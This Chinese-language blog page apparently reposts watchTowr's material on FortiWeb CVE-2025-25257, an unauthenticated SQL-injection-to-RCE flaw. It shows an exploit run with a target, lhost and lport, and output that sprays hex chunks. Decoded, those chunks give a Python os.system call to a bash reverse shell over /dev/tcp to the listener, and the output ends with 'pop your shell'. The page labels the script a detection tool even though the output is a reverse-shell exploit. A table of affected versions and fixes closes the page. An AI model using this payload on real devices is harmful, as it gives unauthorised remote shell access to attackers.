FortiWeb CVE-2025-25257漏洞检测与利用技术解析

本文详细分析了FortiWeb设备中的CVE-2025-25257漏洞,该漏洞允许未经身份验证的SQL注入导致远程代码执行,并提供了检测脚本和受影响版本信息。

watchTowr-vs-FortiWeb-CVE-2025-25257

FortiWeb CVE-2025-25257检测工具生成器

详见我们的博客文章获取技术细节

检测实战

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
python watchTowr-vs-FortiWeb-CVE-2025-25257.py --target https://192.168.8.30/ --lhost 192.168.8.148 --lport 1350
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-FortiWeb-CVE-2025-25257.py

        (*) FortiWeb 未授权SQL注入到远程代码执行检测工具生成器

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-25257]

[*] 喷洒区块 #1/17:        '696d706f72'
[*] 喷洒区块 #2/17:        '74206f733b'
[*] 喷洒区块 #3/17:        '206f732e73'
[*] 喷洒区块 #4/17:        '797374656d'
[*] 喷洒区块 #5/17:        '2827626173'
[*] 喷洒区块 #6/17:        '68202d6320'
[*] 喷洒区块 #7/17:        '222f62696e'
[*] 喷洒区块 #8/17:        '2f62617368'
[*] 喷洒区块 #9/17:        '202d69203e'
[*] 喷洒区块 #10/17:       '26202f6465'
[*] 喷洒区块 #11/17:       '762f746370'
[*] 喷洒区块 #12/17:       '2f3139322e'
[*] 喷洒区块 #13/17:       '3136382e38'
[*] 喷洒区块 #14/17:       '2e3134382f'
[*] 喷洒区块 #15/17:       '3133353020'
[*] 喷洒区块 #16/17:       '303e263122'
[*] 喷洒区块 #17/17:       '2729'

[*] 弹出你的shell!

描述

此脚本尝试检测FortiWeb是否易受CVE-2025-25257影响

受影响版本

以下FortiWeb版本受到影响

版本 受影响范围 解决方案
FortiWeb 7.6 7.6.0 至 7.6.3 升级到7.6.4或更高版本
FortiWeb 7.4 7.4.0 至 7.4.7 升级到7.4.8或更高版本
FortiWeb 7.2 7.2.0 至 7.2.10 升级到7.2.11或更高版本
FortiWeb 7.0 7.0.0 至 7.0.10 升级到7.0.11或更高版本

更多信息请访问FortiGuard Labs PSIRT

关注watchTowr实验室

关注watchTowr实验室团队获取最新安全研究

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计